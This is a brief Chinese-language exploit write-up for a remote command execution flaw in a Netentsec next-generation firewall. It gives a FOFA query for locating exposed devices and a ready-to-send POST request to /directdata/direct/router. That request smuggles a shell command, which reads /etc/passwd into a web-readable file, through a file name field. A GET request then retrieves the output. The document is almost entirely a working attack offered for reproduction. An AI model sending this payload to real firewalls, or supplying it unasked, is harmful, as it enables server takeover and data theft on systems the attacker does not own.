漏洞概述
存在遠程命令執行,漏洞攻擊者可以獲取服務器權限。
FOFA
app="網康科技-下一代防火牆"
漏洞復現
進入登錄頁面抓包


構造數據包
變更發包方式:POST /directdata/direct/router HTTP/1.1
添加POST數據:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
構造數據包
變更發包方式:GET /test.txt HTTP/1.1

